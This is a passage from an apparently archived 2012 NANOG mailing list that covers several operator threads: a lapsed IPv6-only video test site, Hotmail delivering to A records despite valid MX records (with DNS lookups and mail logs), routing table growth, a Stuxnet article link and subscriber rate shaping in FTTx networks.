gmail.com] >>>>>> On Behalf Of Christopher Morrow >>>>>> Sent: Wednesday, July 25, 2012 11:27 AM >>>>>> To: Tina TSOU >>>>>> Cc: nanog at nanog.org >>>>>> Subject: Re: IPv6 only streaming video >>>>>> >>>>>> On Wed, Jul 25, 2012 at 1:11 PM, Tina TSOU >>>>>> wrote: >>>>>>> http://video.v6.labs.lacnic.net/jw/ >>>>>>> Server can not be found since yesterday. Has the URL been changed? >>>>>>> >>>>>>> >>>>>> >>>>>> did you mean to email the lacnic folks? >>>> >> >> >> > From randy at psg.com Wed Jul 25 23:47:03 2012 From: randy at psg.com (Randy Bush) Date: Wed, 25 Jul 2012 21:47:03 -0700 Subject: IPv6 only streaming video In-Reply-To: <6FA3E5FF-AC62-432D-95B7-7A4E57A879DC@huawei.com> References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net> Message-ID: > I'm responsible for IPv6 deployment in my enterprise network, the > users are my colleagues. In this context, I'm not vendor, not > operator. i smell cows From joelja at bogus.com Wed Jul 25 23:48:10 2012 From: joelja at bogus.com (Joel jaeggli) Date: Wed, 25 Jul 2012 21:48:10 -0700 Subject: IPv6 only streaming video In-Reply-To: <7D1D6098-54C4-43B5-83DE-6BF7D04FBF09@huawei.com> References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net> , <5010BDE0.8070406@bogus.com> <7D1D6098-54C4-43B5-83DE-6BF7D04FBF09@huawei.com> Message-ID: <5010CC0A.6050604@bogus.com> On 7/25/12 21:43 , Tina TSOU wrote: > Dear Joel, > Who requests IPv6 only service? you did... check the title of this thread. > Tina > > On Jul 25, 2012, at 8:48 PM, "Joel jaeggli" wrote: > >> On 7/25/12 13:15 , Tina TSOU wrote: >>> Dear all, >>> If you know there is any testing or commercial IPv6 only streaming video we can access, let me know. >>> Thank you. >> >> speaking as a content provider, ipv6-only service requests are misguided. >> >>> Tina >>> >>> >>>> -----Original Message----- >>>> From: Arturo Servin [mailto:aservin at lacnic.net] >>>> Sent: Wednesday, July 25, 2012 12:14 PM >>>> To: Tina TSOU >>>> Cc: nanog at nanog.org >>>> Subject: Re: IPv6 only streaming video >>>> >>>> >>>> The licence expired. >>>> >>>> We will see if we can get another one. >>>> >>>> Cheers, >>>> as >>>> >>>> On 25 Jul 2012, at 15:58, Arturo Servin wrote: >>>> >>>>> >>>>> Oh! >>>>> >>>>> We had it as a test service. We didn't know that it was been used >>>> by more people, so probably somebody turn it off. >>>>> >>>>> I will look around to restart it. >>>>> >>>>> Thanks! >>>>> as >>>>> >>>>> On 25 Jul 2012, at 15:37, Tina TSOU wrote: >>>>> >>>>>> We got offline after discussion in NANOG in May. This IPv6 only >>>> streaming video worked well until recently. We use it in my enterprise >>>> network. >>>>>> I just could not find his contact in my mailbox. So I hope he can >>>> find me again. >>>>>> Does the link accessible from your IPv6 host? >>>>>> >>>>>> Tina >>>>>> @ 2001:db8:1:ffff:e8e2:7822:9d12:e12e >>>>>> >>>>>>> -----Original Message----- >>>>>>> From: christopher.morrow at gmail.com >>>> [mailto:christopher.morrow at gmail.com] >>>>>>> On Behalf Of Christopher Morrow >>>>>>> Sent: Wednesday, July 25, 2012 11:27 AM >>>>>>> To: Tina TSOU >>>>>>> Cc: nanog at nanog.org >>>>>>> Subject: Re: IPv6 only streaming video >>>>>>> >>>>>>> On Wed, Jul 25, 2012 at 1:11 PM, Tina TSOU >>>>>>> wrote: >>>>>>>> http://video.v6.labs.lacnic.net/jw/ >>>>>>>> Server can not be found since yesterday. Has the URL been changed? >>>>>>>> >>>>>>>> >>>>>>> >>>>>>> did you mean to email the lacnic folks? >>>>> >>> >>> >>> >> > From Tina.Tsou.Zouting at huawei.com Wed Jul 25 23:48:48 2012 From: Tina.Tsou.Zouting at huawei.com (Tina TSOU) Date: Thu, 26 Jul 2012 04:48:48 +0000 Subject: IPv6 only streaming video In-Reply-To: References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net> , Message-ID: <1FE43E65-A102-4C2B-9B19-C7433A0CD309@huawei.com> Do u mean I am a cow? I stop breast feeding this year. Tina On Jul 25, 2012, at 9:47 PM, "Randy Bush" wrote: >> I'm responsible for IPv6 deployment in my enterprise network, the >> users are my colleagues. In this context, I'm not vendor, not >> operator. > > i smell cows From Tina.Tsou.Zouting at huawei.com Wed Jul 25 23:59:40 2012 From: Tina.Tsou.Zouting at huawei.com (Tina TSOU) Date: Thu, 26 Jul 2012 04:59:40 +0000 Subject: IPv6 only streaming video In-Reply-To: <5010CC0A.6050604@bogus.com> References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net> , <5010BDE0.8070406@bogus.com> <7D1D6098-54C4-43B5-83DE-6BF7D04FBF09@huawei.com>, <5010CC0A.6050604@bogus.com> Message-ID: Oh I did not, because we have been using http://video.v6.labs.lacnic.net/jw/, and it stopped working recently, and I could not find the contact any more, so I came back to NANOG list which we were connected. Tina On Jul 25, 2012, at 9:48 PM, "Joel jaeggli" > wrote: On 7/25/12 21:43 , Tina TSOU wrote: Dear Joel, Who requests IPv6 only service? you did... check the title of this thread. Tina On Jul 25, 2012, at 8:48 PM, "Joel jaeggli" > wrote: On 7/25/12 13:15 , Tina TSOU wrote: Dear all, If you know there is any testing or commercial IPv6 only streaming video we can access, let me know. Thank you. speaking as a content provider, ipv6-only service requests are misguided. Tina -----Original Message----- From: Arturo Servin [mailto:aservin at lacnic.net] Sent: Wednesday, July 25, 2012 12:14 PM To: Tina TSOU Cc: nanog at nanog.org Subject: Re: IPv6 only streaming video The licence expired. We will see if we can get another one. Cheers, as On 25 Jul 2012, at 15:58, Arturo Servin wrote: Oh! We had it as a test service. We didn't know that it was been used by more people, so probably somebody turn it off. I will look around to restart it. Thanks! as On 25 Jul 2012, at 15:37, Tina TSOU wrote: We got offline after discussion in NANOG in May. This IPv6 only streaming video worked well until recently. We use it in my enterprise network. I just could not find his contact in my mailbox. So I hope he can find me again. Does the link accessible from your IPv6 host? Tina @ 2001:db8:1:ffff:e8e2:7822:9d12:e12e -----Original Message----- From: christopher.morrow at gmail.com [mailto:christopher.morrow at gmail.com] On Behalf Of Christopher Morrow Sent: Wednesday, July 25, 2012 11:27 AM To: Tina TSOU Cc: nanog at nanog.org Subject: Re: IPv6 only streaming video On Wed, Jul 25, 2012 at 1:11 PM, Tina TSOU > wrote: http://video.v6.labs.lacnic.net/jw/ Server can not be found since yesterday. Has the URL been changed? did you mean to email the lacnic folks? From joelja at bogus.com Thu Jul 26 00:08:39 2012 From: joelja at bogus.com (Joel jaeggli) Date: Wed, 25 Jul 2012 22:08:39 -0700 Subject: IPv6 only streaming video In-Reply-To: References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net> , <5010BDE0.8070406@bogus.com> <7D1D6098-54C4-43B5-83DE-6BF7D04FBF09@huawei.com>, <5010CC0A.6050604@bogus.com> Message-ID: <5010D0D7.5060907@bogus.com> On 7/25/12 21:59 , Tina TSOU wrote: > Oh I did not, because we have been > using http://video.v6.labs.lacnic.net/jw/, and it stopped working > recently, and I could not find the contact any more, so I came back to > NANOG list which we were connected. I think you'll find content providers have little interest in delivering v6 only service, the occasional noble test site notwithstanding. v6 enabled however is readily available. Joels-MacBook:~ jjaeggli$ host youtube.com youtube.com has address 74.125.225.40 youtube.com has address 74.125.225.35 youtube.com has address 74.125.225.34 youtube.com has address 74.125.225.39 youtube.com has address 74.125.225.41 youtube.com has address 74.125.225.33 youtube.com has address 74.125.225.37 youtube.com has address 74.125.225.32 youtube.com has address 74.125.225.36 youtube.com has address 74.125.225.46 youtube.com has address 74.125.225.38 youtube.com has IPv6 address 2001:4860:b007::5d > Tina > > On Jul 25, 2012, at 9:48 PM, "Joel jaeggli" > wrote: > >> On 7/25/12 21:43 , Tina TSOU wrote: >>> Dear Joel, >>> Who requests IPv6 only service? >> >> you did... check the title of this thread. >> >>> Tina >>> >>> On Jul 25, 2012, at 8:48 PM, "Joel jaeggli" >> > wrote: >>> >>>> On 7/25/12 13:15 , Tina TSOU wrote: >>>>> Dear all, >>>>> If you know there is any testing or commercial IPv6 only streaming >>>>> video we can access, let me know. >>>>> Thank you. >>>> >>>> speaking as a content provider, ipv6-only service requests are >>>> misguided. >>>> >>>>> Tina >>>>> >>>>> >>>>>> -----Original Message----- >>>>>> From: Arturo Servin [mailto:aservin at lacnic.net] >>>>>> Sent: Wednesday, July 25, 2012 12:14 PM >>>>>> To: Tina TSOU >>>>>> Cc: nanog at nanog.org >>>>>> Subject: Re: IPv6 only streaming video >>>>>> >>>>>> >>>>>> The licence expired. >>>>>> >>>>>> We will see if we can get another one. >>>>>> >>>>>> Cheers, >>>>>> as >>>>>> >>>>>> On 25 Jul 2012, at 15:58, Arturo Servin wrote: >>>>>> >>>>>>> >>>>>>> Oh! >>>>>>> >>>>>>> We had it as a test service. We didn't know that it was been used >>>>>> by more people, so probably somebody turn it off. >>>>>>> >>>>>>> I will look around to restart it. >>>>>>> >>>>>>> Thanks! >>>>>>> as >>>>>>> >>>>>>> On 25 Jul 2012, at 15:37, Tina TSOU wrote: >>>>>>> >>>>>>>> We got offline after discussion in NANOG in May. This IPv6 only >>>>>> streaming video worked well until recently. We use it in my enterprise >>>>>> network. >>>>>>>> I just could not find his contact in my mailbox. So I hope he can >>>>>> find me again. >>>>>>>> Does the link accessible from your IPv6 host? >>>>>>>> >>>>>>>> Tina >>>>>>>> @ 2001:db8:1:ffff:e8e2:7822:9d12:e12e >>>>>>>> >>>>>>>>> -----Original Message----- >>>>>>>>> From: christopher.morrow at gmail.com >>>>>>>>> >>>>>> [mailto:christopher.morrow at gmail.com] >>>>>>>>> On Behalf Of Christopher Morrow >>>>>>>>> Sent: Wednesday, July 25, 2012 11:27 AM >>>>>>>>> To: Tina TSOU >>>>>>>>> Cc: nanog at nanog.org >>>>>>>>> Subject: Re: IPv6 only streaming video >>>>>>>>> >>>>>>>>> On Wed, Jul 25, 2012 at 1:11 PM, Tina TSOU >>>>>>>>> >>>>>>>> > wrote: >>>>>>>>>> http://video.v6.labs.lacnic.net/jw/ >>>>>>>>>> Server can not be found since yesterday. Has the URL been changed? >>>>>>>>>> >>>>>>>>>> >>>>>>>>> >>>>>>>>> did you mean to email the lacnic folks? >>>>>>> >>>>> >>>>> >>>>> >>>> >>> >> From lou at metron.com Thu Jul 26 02:14:41 2012 From: lou at metron.com (Lou Katz) Date: Thu, 26 Jul 2012 00:14:41 -0700 Subject: Is Hotmail in the habit of ignoring MX records? Message-ID: <20120726071441.GA11199@metron.com> One of my users has reported incoming mail failures, which I finally tracked down. It turned out that Hotmail has seen fit to send the mail to his domain's A record machine, despite the fact that he has valid MX records. The A record points to my webserver, which does not normally accept mail for anyone. The mail server MX records are to an entirely different machine. Comments? Do I need more valium? -=[L]=- -- From ops.lists at gmail.com Thu Jul 26 02:21:49 2012 From: ops.lists at gmail.com (Suresh Ramasubramanian) Date: Thu, 26 Jul 2012 12:51:49 +0530 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: <20120726071441.GA11199@metron.com> References: <20120726071441.GA11199@metron.com> Message-ID: If the MX records are not responsive / timing out, they might be falling back to the A record. On Thu, Jul 26, 2012 at 12:44 PM, Lou Katz wrote: > One of my users has reported incoming mail failures, which I finally > tracked down. It turned out that Hotmail has seen fit to send the mail > to his domain's A record machine, despite the fact that he has valid MX > records. > > The A record points to my webserver, which does not normally accept mail > for anyone. The mail server MX records are to an entirely different > machine. > -- Suresh Ramasubramanian (ops.lists at gmail.com) From mysidia at gmail.com Thu Jul 26 02:38:31 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Thu, 26 Jul 2012 02:38:31 -0500 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: <20120726071441.GA11199@metron.com> References: <20120726071441.GA11199@metron.com> Message-ID: On 7/26/12, Lou Katz wrote: > One of my users has reported incoming mail failures, which I finally > tracked down. It turned out that Hotmail has seen fit to send the mail > to his domain's A record machine, despite the fact that he has valid MX > records. You looked in the mail headers and saw hotmail's mail server do that, or the From address/return path just happens to be hotmail? I would ask for a specific example of a domain name in which that seems to happen, and exact DNS zone contents. I am sure that Hotmail does not ignore MX in general, unless they just broke something; many domains require MX processing and A record to properly be ignored for mail to be accepted. But there may be something else going on with a specific domain or DNS queries/responses from its nameservers, that results in MX being ignored or unavailable, resulting in a fallback to 'lookup A'. An example could be some dns issue such as slow response to MX query, 'MX to a CNAME', 'MX to an invalid label that looks like an IP', MX DNS response packet too large, .... -- -JH From lou at metron.com Thu Jul 26 03:35:35 2012 From: lou at metron.com (Lou Katz) Date: Thu, 26 Jul 2012 01:35:35 -0700 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: References: <20120726071441.GA11199@metron.com> Message-ID: <20120726083535.GA13414@metron.com> On Thu, Jul 26, 2012 at 02:38:31AM -0500, Jimmy Hess wrote: > On 7/26/12, Lou Katz wrote: > > One of my users has reported incoming mail failures, which I finally > > tracked down. It turned out that Hotmail has seen fit to send the mail > > to his domain's A record machine, despite the fact that he has valid MX > > records. > > You looked in the mail headers and saw hotmail's mail server do that, > or the From address/return path just happens to be hotmail? > I would ask for a specific example of a domain name in which that > seems to happen, and exact DNS zone contents. > > I am sure that Hotmail does not ignore MX in general, unless they > just broke something; many domains require MX processing and A record > to properly be ignored for mail to be accepted. But there may be > something else going on with a specific domain or DNS > queries/responses from its nameservers, that results in MX being > ignored or unavailable, resulting in a fallback to 'lookup A'. > > An example could be some dns issue such as slow response to MX query, > 'MX to a CNAME', 'MX to an invalid label that looks like an IP', MX > DNS response packet too large, > .... > > > -- > -JH Unfortunately, all I get from my user is a snippet, and it took me a while to realize that I had to look at the mail logs of my web server, not my mail server, to find the transaction. The domain is cookephoto.com - and here is my zone file: plaid# dig cookephoto.com any ; <<>> DiG 9.3.3 <<>> cookephoto.com any ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 55698 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 8, AUTHORITY: 0, ADDITIONAL: 8 ;; QUESTION SECTION: ;cookephoto.com. IN ANY ;; ANSWER SECTION: cookephoto.com. 172800 IN SOA ns.metron.com. hostmeister.metron.com. 2012011900 21600 3600 345600 345600 cookephoto.com. 172800 IN NS ns2.metron.com. cookephoto.com. 172800 IN NS ns1.metron.com. cookephoto.com. 172800 IN NS ns3.metron.com. cookephoto.com. 172800 IN MX 12 mail2.metron.com. cookephoto.com. 172800 IN MX 15 mail.katz.com. cookephoto.com. 172800 IN MX 10 mail.metron.com. cookephoto.com. 172800 IN A 192.160.193.89 ;; ADDITIONAL SECTION: ns1.metron.com. 3600 IN A 192.160.193.34 ns2.metron.com. 3600 IN A 209.204.189.89 ns2.metron.com. 3600 IN AAAA 2001:470:838d::89 ns3.metron.com. 3600 IN A 192.160.193.55 ns3.metron.com. 3600 IN AAAA 2001:470:838d::55 mail.metron.com. 3600 IN A 192.160.193.14 mail2.metron.com. 3600 IN A 209.204.189.91 mail.katz.com. 28800 IN A 192.160.193.14 and here is the maillog for the transaction, slightly redacted: Jul 25 13:13:07 plaid sm-mta[5121]: NOQUEUE: connect from blu0-omc2-s2.blu0.hotmail.com [65.55.111.77] Jul 25 13:13:07 plaid sm-mta[5121]: q6PKD7bH005121: --- 220 plaid.metron.com ESMTP Sendmail 8.13.8/8.13.8; Wed, 25 Jul 2012 13:13:07 -0700 (PDT) Jul 25 13:13:07 plaid sm-mta[5121]: q6PKD7bH005121: <-- EHLO blu0-omc2-s2.blu0.hotmail.com Jul 25 13:13:07 plaid sm-mta[5121]: q6PKD7bH005121: --- 250-plaid.metron.com Hello blu0-omc2-s2.blu0.hotmail.com [65.55.111.77], pleased to meet you Jul 25 13:13:07 plaid sm-mta[5121]: q6PKD7bH005121: <-- MAIL FROM: Jul 25 13:13:07 plaid sm-mta[5121]: q6PKD7bH005121: --- 250 2.1.0 ... Sender ok Jul 25 13:13:08 plaid sm-mta[5121]: q6PKD7bH005121: <-- RCPT TO: Jul 25 13:13:08 plaid sm-mta[5121]: q6PKD7bH005121: --- 550 5.7.1 ... Relaying denied Jul 25 13:13:08 plaid sm-mta[5121]: q6PKD7bH005121: ruleset=check_rcpt, arg1=, relay=blu0-omc2-s2.blu0.hotmail.com [65.55.111.77], reject=550 5.7.1 ... Relaying denied Jul 25 13:13:08 plaid sm-mta[5121]: q6PKD7bH005121: <-- RSET Jul 25 13:13:08 plaid sm-mta[5121]: q6PKD7bH005121: --- 250 2.0.0 Reset state Jul 25 13:13:08 plaid sm-mta[5121]: q6PKD7bH005121: from=, size=0, class=0, nrcpts=0, proto=ESMTP, daemon=IPv4, relay=blu0-omc2-s2.blu0.hotmail.com [65.55.111.77] Jul 25 13:13:08 plaid sm-mta[5121]: q6PKD7bI005121: <-- QUIT Jul 25 13:13:08 plaid sm-mta[5121]: q6PKD7bI005121: --- 221 2.0.0 plaid.metron.com closing connection The 5.7.1 relaying denied is correct, since the webserver does not accept mail for the website domains. At the time of the transaction, nothing special was happening here, and other mail was flowing quite nicely into the mail server. Other Hotmail servers were sending to other recipients here through the regular mailserver OK. Thanks for looking at it. -=[L]=- From blakjak at blakjak.net Thu Jul 26 05:32:05 2012 From: blakjak at blakjak.net (Mark Foster) Date: Thu, 26 Jul 2012 22:32:05 +1200 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: <20120726083535.GA13414@metron.com> References: <20120726071441.GA11199@metron.com> <20120726083535.GA13414@metron.com> Message-ID: <50111CA5.4090002@blakjak.net> On 26/07/12 20:35, Lou Katz wrote: > On Thu, Jul 26, 2012 at 02:38:31AM -0500, Jimmy Hess wrote: >> On 7/26/12, Lou Katz wrote: >>> One of my users has reported incoming mail failures, which I finally >>> tracked down. It turned out that Hotmail has seen fit to send the mail >>> to his domain's A record machine, despite the fact that he has valid MX >>> records. >> You looked in the mail headers and saw hotmail's mail server do that, >> or the From address/return path just happens to be hotmail? >> I would ask for a specific example of a domain name in which that >> seems to happen, and exact DNS zone contents. >> >> I am sure that Hotmail does not ignore MX in general, unless they No, they do. The exact same thing has happened to me - twice, with two seperate scenarios being fundamentally similar. The MX is ignored, the non-host A record is tried, if it accepts connections on Port 25 it uses this instead. This behavior forced me to set up the mail server on the same box as a webserver I administer to act as a secondary MX for another domain I administer (mail is elsewhere), in one case. In the other, I had to simply write off the option of having http://domain working, and live with just http://www.domain, due to the use of a third party web host that also had an MTA on their machine that was rejecting my email. Like all the behemoth service providers, it's impossible to find someone useful to talk to about these things. I posted on Mailop about it a few months ago, but it's not new behavior - the first instance I came across was more than 2 years ago. Mark. From jared at puck.nether.net Thu Jul 26 06:33:16 2012 From: jared at puck.nether.net (Jared Mauch) Date: Thu, 26 Jul 2012 07:33:16 -0400 Subject: Weekly Routing Table Report In-Reply-To: References: <201207201910.q6KJAkHr026414@thyme.rand.apnic.net> <36781.1342814676@turing-police.cc.vt.edu> <716F2E24-2A9C-411C-97D8-59C25003FB7A@spawar.navy.mil> <451C7E1E-7F98-44FD-8EB4-7F3F118E3261@puck.nether.net> Message-ID: <1AC92773-7D56-4E50-8B69-A8AC33DF3959@puck.nether.net> On Jul 25, 2012, at 10:16 PM, Geoff Huston wrote: > > On 21/07/2012, at 6:40 AM, Jared Mauch wrote: > >> >> On Jul 20, 2012, at 4:30 PM, Ron Broersma wrote: >> >>> >>> On Jul 20, 2012, at 1:04 PM, valdis.kletnieks at vt.edu wrote: >>>> On Sat, 21 Jul 2012 05:10:41 +1000, Routing Analysis Role Account said: >>>>> BGP routing table entries examined: 418048 >>>> So, whatever happened to that whole "the internet will catch fire when >>>> we get to 280K routing table entries" or whatever it was? :) >>> >>> We added memory where we could, or bought bigger routers. The new (conventional wisdom) limit is 1M routes. >> >> I think you mean 512k IPv4 with 256k of IPv6 (taking double space). > > 512K of IPv4? That's getting close! I know a few people had issues around the 256k barrier from tcam based platforms. Expect a lot of BGP instability as people react to 512k entries in their fib From mjwise at kapu.net Thu Jul 26 08:53:24 2012 From: mjwise at kapu.net (Michael J Wise) Date: Thu, 26 Jul 2012 06:53:24 -0700 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: <20120726083535.GA13414@metron.com> References: <20120726071441.GA11199@metron.com> <20120726083535.GA13414@metron.com> Message-ID: On Jul 26, 2012, at 1:35 AM, Lou Katz wrote: > The domain is cookephoto.com Why does mail.metron.com have MX records? And they're different. $ host cookephoto.com cookephoto.com has address 192.160.193.89 cookephoto.com mail is handled by 10 mail.metron.com. cookephoto.com mail is handled by 12 mail2.metron.com. cookephoto.com mail is handled by 15 mail.katz.com. $ host mail.metron.com mail.metron.com has address 192.160.193.14 mail.metron.com mail is handled by 10 mail.metron.com. mail.metron.com mail is handled by 20 mail.katz.com. $ host mail.katz.com mail.katz.com has address 192.160.193.14 $ host mail2.metron.com mail2.metron.com has address 209.204.189.91 $ host plaid.metron.com plaid.metron.com has address 192.160.193.135 Normally, in my experience, the actual mail server doesn't have MX records as such, but?. Just seems 0dd. Also, you say ? > At the time of the transaction, nothing special was happening here, ... Was anything strange happening with any of the DNS records for any of these domains in the past two days? Aloha, Michael. -- "Please have your Internet License and Usenet Registration handy..." From ryan at u13.net Thu Jul 26 09:05:55 2012 From: ryan at u13.net (Ryan Rawdon) Date: Thu, 26 Jul 2012 09:05:55 -0500 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: <20120726071441.GA11199@metron.com> References: <20120726071441.GA11199@metron.com> Message-ID: <6B5C60E0-7A00-4623-81DF-BB68A8B168E3@u13.net> On Jul 26, 2012, at 2:14 AM, Lou Katz wrote: > One of my users has reported incoming mail failures, which I finally > tracked down. It turned out that Hotmail has seen fit to send the mail > to his domain's A record machine, despite the fact that he has valid MX records. > > The A record points to my webserver, which does not normally accept mail > for anyone. The mail server MX records are to an entirely different machine. > > Comments? > > Do I need more valium? If you subscribe to http://mailop.org and look in the archives, you'll see a thread named '[mailop] Hotmail ignoring MX, going direct to @ IN A? ' from March of this year (which carries over into April). In this thread Mark Foster encounters the same issue, and upon investigation others (including myself) see it as well. I found that we were having the same issue after users on Hotmail were forwarding us DSNs regarding messages that our mail server had never seen, however upon checking our web servers for that hostname we found connections and delivery attempts from Hotmail. Additionally, quoted from Tony Finch in the mailop thread regarding 'what if your MXes are broken and it is just failing back to A': If one or more MX RRs are found for a given name, SMTP systems MUST NOT utilize any address RRs associated with that name unless they are located using the MX RRs; the "implicit MX" rule above applies only if there are no MX records present. If MX records are present, but none of them are usable, this situation MUST be reported as an error. No solution to the issue was found in the various forks of that thread, however one individual afflicted by this issue (the OP) seems to have resolved his specific issue with Hotmail by fixing his MX records to be in stricter compliance with RFCs and best practices (removed a CNAME) - that said, per the quote above Hotmail should not have been falling back to the A records or any other RRs for the hostname. The matter is still unresolved for us and presumably others on the list except for the OP > > -=[L]=- > -- > From ryan at u13.net Thu Jul 26 09:10:15 2012 From: ryan at u13.net (Ryan Rawdon) Date: Thu, 26 Jul 2012 09:10:15 -0500 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: References: <20120726071441.GA11199@metron.com> Message-ID: On Jul 26, 2012, at 2:21 AM, Suresh Ramasubramanian wrote: > If the MX records are not responsive / timing out, they might be falling > back to the A record. > Per RFC2821 (and later RFC5321): If one or more MX RRs are found for a given name, SMTP systems MUST NOT utilize any address RRs associated with that name unless they are located using the MX RRs; the "implicit MX" rule above applies only if there are no MX records present. If MX records are present, but none of them are usable, this situation MUST be reported as an error. So while it is possible they are doing this, they should not be Ryan > > -- > Suresh Ramasubramanian (ops.lists at gmail.com) From gbonser at seven.com Thu Jul 26 11:12:24 2012 From: gbonser at seven.com (George Bonser) Date: Thu, 26 Jul 2012 16:12:24 +0000 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: <6B5C60E0-7A00-4623-81DF-BB68A8B168E3@u13.net> References: <20120726071441.GA11199@metron.com> <6B5C60E0-7A00-4623-81DF-BB68A8B168E3@u13.net> Message-ID: <596B74B410EE6B4CA8A30C3AF1A155EA09E962FE@RWC-MBX1.corp.seven.com> > From: Ryan Rawdon > Sent: Thursday, July 26, 2012 7:06 AM > To: nanog at nanog.org > Subject: Re: Is Hotmail in the habit of ignoring MX records? > No solution to the issue was found in the various forks of that thread, > however one individual afflicted by this issue (the OP) seems to have > resolved his specific issue with Hotmail by fixing his MX records to be > in stricter compliance with RFCs and best practices (removed a CNAME) - > that said, per the quote above Hotmail should not have been falling > back to the A records or any other RRs for the hostname. I would say MX pointing to a CNAME instead of pointing to an A record is the #1 cause of intermittent mail delivery problems I have seen. Some MTAs seem to tolerate it, some don't. G From jhellenthal at dataix.net Thu Jul 26 11:20:51 2012 From: jhellenthal at dataix.net (Jason Hellenthal) Date: Thu, 26 Jul 2012 12:20:51 -0400 Subject: IPv6 only streaming video In-Reply-To: <1FE43E65-A102-4C2B-9B19-C7433A0CD309@huawei.com> References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net> <1FE43E65-A102-4C2B-9B19-C7433A0CD309@huawei.com> Message-ID: <20120726162050.GA78891@DataIX.net> On Thu, Jul 26, 2012 at 04:48:48AM +0000, Tina TSOU wrote: > Do u mean I am a cow? I stop breast feeding this year. > > Tina ROGFLOL This is the best thing I have read yet this morning. Thanks for the laugh. > > On Jul 25, 2012, at 9:47 PM, "Randy Bush" wrote: > > >> I'm responsible for IPv6 deployment in my enterprise network, the > >> users are my colleagues. In this context, I'm not vendor, not > >> operator. > > > > i smell cows > -- - (2^(N-1)) JJH48-ARIN From shortdudey123 at gmail.com Thu Jul 26 11:24:41 2012 From: shortdudey123 at gmail.com (Grant Ridder) Date: Thu, 26 Jul 2012 11:24:41 -0500 Subject: Stuxnet Message-ID: Hi Everyone, I realize most people already know the history of Stuxnet but i figured i would pass along an IEEE article that was just published. http://spectrum.ieee.org/computing/networks/declarations-of-cyberwar -Grant From lou at metron.com Thu Jul 26 12:29:21 2012 From: lou at metron.com (Lou Katz) Date: Thu, 26 Jul 2012 10:29:21 -0700 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: <6B5C60E0-7A00-4623-81DF-BB68A8B168E3@u13.net> References: <20120726071441.GA11199@metron.com> <6B5C60E0-7A00-4623-81DF-BB68A8B168E3@u13.net> Message-ID: <20120726172921.GA32237@metron.com> On Thu, Jul 26, 2012 at 09:05:55AM -0500, Ryan Rawdon wrote: > > On Jul 26, 2012, at 2:14 AM, Lou Katz wrote: > > > One of my users has reported incoming mail failures, which I finally > > tracked down. It turned out that Hotmail has seen fit to send the mail > > to his domain's A record machine, despite the fact that he has valid MX records. > > > > The A record points to my webserver, which does not normally accept mail > > for anyone. The mail server MX records are to an entirely different machine. > > > > Comments? > > > > Do I need more valium? > > > If you subscribe to http://mailop.org and look in the archives, you'll see a thread named '[mailop] Hotmail ignoring MX, going direct to @ IN A? ' from March of this year (which carries over into April). In this thread Mark Foster encounters the same issue, and upon investigation others (including myself) see it as well. > Ahh - I knew I had seen this before, but thought it was here (nanog) rather than on mailops. I think I may try setting the A record for the domain to my mailserver, and letting the webserver there redirect the http requests. I dislike putting a webserver on the unadorned domain, but out there in the 'real' world, folks seem to have become accustomed to leaving off the 'www'. Thanks for the replies; I'll take this over to mailops if there is any more to say. The funny thing is that this behavior with respect to Hotmail has not affected any of the other couple of dozen domains with similar or identical configurations here. Oh, well. -=[L]=- -- From jason at lixfeld.ca Thu Jul 26 14:45:14 2012 From: jason at lixfeld.ca (Jason Lixfeld) Date: Thu, 26 Jul 2012 15:45:14 -0400 Subject: Rate shaping in Active E FTTx networks Message-ID: Hi all, I'm trying to gauge what operators are doing to handle per-subscriber Internet access PIR bandwidth in Active E FTTx networks. I presume operators would want to limit the each subscriber to a certain PIR, but within that limit, do things like perform preferential treatment of interactive services like steaming video or Skype, etc., ahead of non-interactive services like FTP. My impression is that a subscriber's physical access in these networks is exponentially larger than their allocated amount of Internet access. This would leave ample room on the physical access access for other services like Voice and IPTV that might run on separate VLANs than the Internet access VLAN. That said, I doubt there's really that much of a concern about allocating PIR on these other service VLANs. So in terms of PIR for Internet access, is there some magic box that sits between the various subscriber aggregation points and the core, which takes care of shaping the subscriber's Internet access PIR, while making sure that the any preferential treatment of interactive services is performed. Is that a lot to ask for one box? The ridiculously deep buffers required in order to shape to PIR vs. police to it (because policing to a PIR is just plain ugly) and the requirements to perform any sort of preferential packet treatment above and beyond that seem like quite a lot to ask of one box. Am I wrong? Who might make a box like this, if it exists? And if not, what are folks using the achieve these results? Thanks in advance for any insights.. From gih at apnic.net Thu Jul 26 15:54:58 2012 From: gih at apnic.net (Geoff Huston) Date: Thu, 26 Jul 2012 20:54:58 -0000 Subject: [routing-wg] The Cidr Report In-Reply-To: <201110142200.p9EM00ua002638@wattle.apnic.net> References: <201110142200.p9EM00ua002638@wattle.apnic.net> Message-ID: From cidr-report at potaroo.net Thu Jul 26 19:40:12 2012 From: cidr-report at potaroo.net (cidr-report at potaroo.net) Date: Fri, 27 Jul 2012 00:40:12 GMT Subject: The Cidr Report Message-ID: <201207270040.q6R0eCFW047528@wattle.apnic.net> This report has been generated at Fri Jul 27 00:13:01 2012 AEST. The report analyses the BGP Routing Table of AS2.0 router and generates a report on aggregation potential within the table. Check http://www.cidr-report.org for a current version of this report. Recent Table History Date Prefixes CIDR Agg 20-07-12 419152 